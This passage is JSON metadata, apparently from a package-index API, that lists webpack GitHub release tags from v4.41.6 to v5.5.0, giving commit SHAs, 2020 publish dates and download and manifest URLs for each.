hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.5.0/manifests"},{"name":"v5.4.0","sha":"84dafd164499b6080243cf9d00537b47b6e075c2","kind":"tag","published_at":"2020-11-03T15:28:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.4.0/manifests"},{"name":"v5.3.2","sha":"3df96f4a7843ef07794c31da8c7469dff133a228","kind":"tag","published_at":"2020-10-29T19:52:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.2/manifests"},{"name":"v5.3.1","sha":"dfae6f0ac70e1f4ec6d25a853838d4aa58e10e1f","kind":"tag","published_at":"2020-10-28T21:07:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"ab555844701209492debf23cc3168a0efafb3251","kind":"tag","published_at":"2020-10-27T11:52:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.3.0/manifests"},{"name":"v5.2.1","sha":"d09357b4008da750e0d90066b2cd9567edc27a61","kind":"tag","published_at":"2020-10-27T11:02:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"d42705c05dd62d562b759fb518f86c9854435df4","kind":"tag","published_at":"2020-10-22T16:59:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.2.0/manifests"},{"name":"v5.1.3","sha":"c90dfadbc6c5ac1ab4bda2cc106958b65fb5e6e7","kind":"tag","published_at":"2020-10-16T13:36:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.3/manifests"},{"name":"v5.1.2","sha":"83790375529c5b2967d45ed40700399e107d478f","kind":"tag","published_at":"2020-10-15T18:41:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.2/manifests"},{"name":"v5.1.1","sha":"f2f998b58362d5edc9945a48f8245a3347ad007c","kind":"tag","published_at":"2020-10-15T13:08:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.1/manifests"},{"name":"v5.1.0","sha":"77329b4d0e1aa35e26d8a32b2a8968a824b5de9c","kind":"tag","published_at":"2020-10-13T12:37:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.1.0/manifests"},{"name":"v5.0.0","sha":"610f36817af1f1c6929786d68f734ac582af1757","kind":"tag","published_at":"2020-10-10T20:07:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0/manifests"},{"name":"v5.0.0-rc.6","sha":"75ecff262ef0c1953e0d13c0b6a06bdad7ccace5","kind":"tag","published_at":"2020-10-10T19:03:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.6/manifests"},{"name":"v5.0.0-rc.5","sha":"57b493f6ff0bd55dddfbfc7ffc2f2680a7f82a6d","kind":"tag","published_at":"2020-10-09T22:38:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.5/manifests"},{"name":"v5.0.0-rc.4","sha":"1755fe30224943bca80e14634b4cf3f876e529ef","kind":"tag","published_at":"2020-10-07T08:49:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.4/manifests"},{"name":"v5.0.0-rc.3","sha":"ef38f322a963034271b76258beed35239760f526","kind":"tag","published_at":"2020-09-30T08:48:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.3/manifests"},{"name":"v5.0.0-rc.2","sha":"d49b49ddebc6c06703e19ff6391915d2b09b0f2b","kind":"tag","published_at":"2020-09-29T18:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.2/manifests"},{"name":"v5.0.0-rc.1","sha":"f60db1a079c7df48400637c54c547c161ed189da","kind":"tag","published_at":"2020-09-28T19:18:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.1/manifests"},{"name":"v5.0.0-rc.0","sha":"658209c253287de9edee85293d23123d5183a873","kind":"tag","published_at":"2020-09-20T21:11:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-rc.0/manifests"},{"name":"v5.0.0-beta.33","sha":"dd3ec4f8072605479410ee7c13cb7a12688939d1","kind":"tag","published_at":"2020-09-20T21:10:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.33","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.33","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.33","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.33/manifests"},{"name":"v5.0.0-beta.32","sha":"e81882adb2ca1a3cceb3dc28d4f73c09f013eb83","kind":"tag","published_at":"2020-09-18T18:08:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.32/manifests"},{"name":"v4.44.2","sha":"2efeb4b5787e868e69233aa9dec469c200fa3b2c","kind":"tag","published_at":"2020-09-17T23:43:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.2/manifests"},{"name":"v5.0.0-beta.31","sha":"ea492a530f83b35346986c374f8394814f187eb8","kind":"tag","published_at":"2020-09-17T13:43:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.31/manifests"},{"name":"v5.0.0-beta.30","sha":"922c95e9b458e44b999aca2c45d9540079a225b2","kind":"tag","published_at":"2020-09-11T21:55:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.30/manifests"},{"name":"v5.0.0-beta.29","sha":"7bc3a031996d17d859d7a5b077ce1c5ab5dc7e29","kind":"tag","published_at":"2020-08-28T19:21:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.29/manifests"},{"name":"v5.0.0-beta.28","sha":"e32daa9be5fed184c8befac87216a88872f7df4a","kind":"tag","published_at":"2020-08-20T09:42:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.28/manifests"},{"name":"v5.0.0-beta.27","sha":"3cdff531d77ee63251a385e3b6e3ccca2ec37a64","kind":"tag","published_at":"2020-08-19T20:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.27/manifests"},{"name":"v5.0.0-beta.26","sha":"f2b68e0b77a3b4199c0d6989eeb69bd9a0bdb2ed","kind":"tag","published_at":"2020-08-14T19:06:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.26/manifests"},{"name":"v5.0.0-beta.25","sha":"377348be6c32895a3d440b3643963f71c730aa85","kind":"tag","published_at":"2020-08-10T14:13:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.25/manifests"},{"name":"v5.0.0-beta.24","sha":"bcc93305d8558285d30ea7142517491c3cdfd46c","kind":"tag","published_at":"2020-08-05T12:29:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.24/manifests"},{"name":"v5.0.0-beta.23","sha":"a14f073b358a9391dc70e791b6309adcdc21ec79","kind":"tag","published_at":"2020-08-02T05:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.23/manifests"},{"name":"v4.44.1","sha":"cd4af164784f3938353102179adfcbcf8f53949d","kind":"tag","published_at":"2020-07-30T08:02:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.1/manifests"},{"name":"v4.44.0","sha":"d4603c6d7ef4acfbe956ef49d8476c7368526989","kind":"tag","published_at":"2020-07-24T17:13:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.44.0/manifests"},{"name":"v5.0.0-beta.22","sha":"00226ff3de02078c641ef0426a5425c184510b8a","kind":"tag","published_at":"2020-07-09T11:51:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.22/manifests"},{"name":"v5.0.0-beta.21","sha":"20ba3c07803a3fd580755937016f0d5c85c1ccd3","kind":"tag","published_at":"2020-07-06T21:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.21/manifests"},{"name":"v5.0.0-beta.20","sha":"8efea230e05561fbaf3f9872e01affcac399cb3a","kind":"tag","published_at":"2020-06-29T16:29:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.20/manifests"},{"name":"v5.0.0-beta.19","sha":"3347fa1cee621c7f684b25507fdaed3264e8dcd9","kind":"tag","published_at":"2020-06-29T15:19:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.19/manifests"},{"name":"v5.0.0-beta.18","sha":"5c9fdeb9e1158a45de2350a7e858f550d73adf55","kind":"tag","published_at":"2020-06-17T23:25:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.18/manifests"},{"name":"v5.0.0-beta.17","sha":"a0716cf6bc074ec0d21fe72120cda103dabf8f9a","kind":"tag","published_at":"2020-06-03T07:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.17/manifests"},{"name":"v5.0.0-beta.16","sha":"b7f08b42b85f89e52facac426251d26ec64f2e6d","kind":"tag","published_at":"2020-05-05T22:03:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.16/manifests"},{"name":"v4.43.0","sha":"c9d4ff7b054fc581c96ce0e53432d44f9dd8ca72","kind":"tag","published_at":"2020-04-21T14:24:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.43.0/manifests"},{"name":"v5.0.0-beta.15","sha":"4c7e5e667bd30affa2e8c3bc8c65fd38e90912fe","kind":"tag","published_at":"2020-04-21T12:06:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.15/manifests"},{"name":"v4.42.1","sha":"71eb5931dbd7db125109a95692065333cea936a9","kind":"tag","published_at":"2020-03-24T06:23:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.1/manifests"},{"name":"v5.0.0-beta.14","sha":"59f8dc824ec169252476fa5b476e14c95f7bda40","kind":"tag","published_at":"2020-03-02T16:32:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.14/manifests"},{"name":"v4.42.0","sha":"29d851bf6d1e5d59eafb688d51396e70d12057c9","kind":"tag","published_at":"2020-03-02T08:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.42.0/manifests"},{"name":"v4.41.6","sha":"71be3bfa45a55aa8ea1b954ab1302565bb073bbc","kind":"tag","published_at":"2020-02-11T10:16:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.6","manifests_url":"https: